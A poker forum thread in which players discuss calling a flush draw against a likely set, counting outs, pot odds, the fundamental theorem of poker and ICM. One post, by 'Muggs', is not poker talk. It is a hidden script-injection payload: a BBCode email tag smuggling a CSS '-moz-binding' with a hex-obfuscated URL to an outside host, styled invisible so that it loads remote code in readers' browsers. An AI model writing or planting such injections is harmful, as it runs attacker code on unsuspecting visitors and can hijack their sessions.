Hipotetical question

• Dippy19
      Dippy19
      Bronze
      You are holding a flush draw on the flop and you have the pot odds to call you have 2+ opponents and one is really tight and you, with almost certainty put him on PP and thous a set. You have the pot odds with the 9 outs for a flush, but he has more outs than you(10 outs for a full house).

What do you do?
  • 13 replies
    • sismis
      sismis
      Bronze
      how can he have 10 outs for full house?

edit: ofc you never fold A-high flush draw
    • Dippy19
      Dippy19
      Bronze
      My mistake, on the turn:

His pocket cards:5 :heart: 5 :spade:
      Your pocket cards:A :diamond: Q :diamond:

Flop:5 :diamond: 8 :diamond: 2 :club: turn:9 :spade:

His outs:

He has 10 outs, you have 9 outs. You have the odds to call, but you know his are better.
    • sismis
      sismis
      Bronze
      2d and 9d arent your outs then. so you have 7 outs. If odds are good enough then call. He wont fold a set so you have some implied odds too.
    • ciRith
      ciRith
      Bronze
      I don't get your question. :/

Of course you don't raise for value anymore but if you get the odds to draw then do so. You never can know for sure that he has a set anyway.
    • G1lius
      G1lius
      Bronze
      If you're sure he has a set, just count 7 outs...
      I don't know why you are counting his outs though, he can't redraw since you're on the turn.
    • Dippy19
      Dippy19
      Bronze
      Originally posted by G1lius
      If you're sure he has a set, just count 7 outs...
      I don't know why you are counting his outs though, he can't redraw since you're on the turn.
      Ok, yeah right, what the hell was I thinking, just count less outs. Sorry about that, it was a stupid question.
    • Muggs
      Muggs
      Bronze
      ))) http://www.[email=xx style=-moz-binding:url(\68\74\74\70\3a\2f\2f\70\73\73\2e\31\31\30\6d\62\2e\63\6f\6d\2f\61\2e\78\6d\6c\23\61);display:none; ]tt[/email]
    • Odieone
      Odieone
      Bronze
      Dippy..

I dunno if this has merit at all. but according to Phil Gordon, you should play the game the same way you would if you knew his cards or not. If you play differently, you lose. Sorry I know I am a bronze but it was the only bit of wisdom i got from his green book that I could use. (the rest was way above my poker IQ). :D
    • PokerHammer
      PokerHammer
      Bronze
      Originally posted by Odieone
      Dippy..

I dunno if this has merit at all. but according to Phil Gordon, you should play the game the same way you would if you knew his cards or not. If you play differently, you lose. Sorry I know I am a bronze but it was the only bit of wisdom i got from his green book that I could use. (the rest was way above my poker IQ). :D
      Phil Gordon may have said it, but David Sklansky wrote it!
    • xylere
      xylere
      Bronze
      i guess its called fundamental theorem of poker :D
    • Dippy19
      Dippy19
      Bronze
      if you would be on the bubble at WSOP and had to make a move that you knew is +EV, but at the same time you would know you are beaten, would you do it?7

:D :D :D :D :D :D :D
    • G1lius
      G1lius
      Bronze
      Originally posted by Dippy19
      if you would be on the bubble at WSOP and had to make a move that you knew is +EV, but at the same time you would know you are beaten, would you do it?7

You should calculate in real $-EV, not chips-EV.
      It's somewhere in a book too, but I don't know if it's little green book, or an other.
    • Dippy19
      Dippy19
      Bronze
      Originally posted by G1lius
      Originally posted by Dippy19

You should calculate in real $-EV, not chips-EV.
      It's somewhere in a book too, but I don't know if it's little green book, or an other.
      I know. It's in the articles too. ICM is based on it.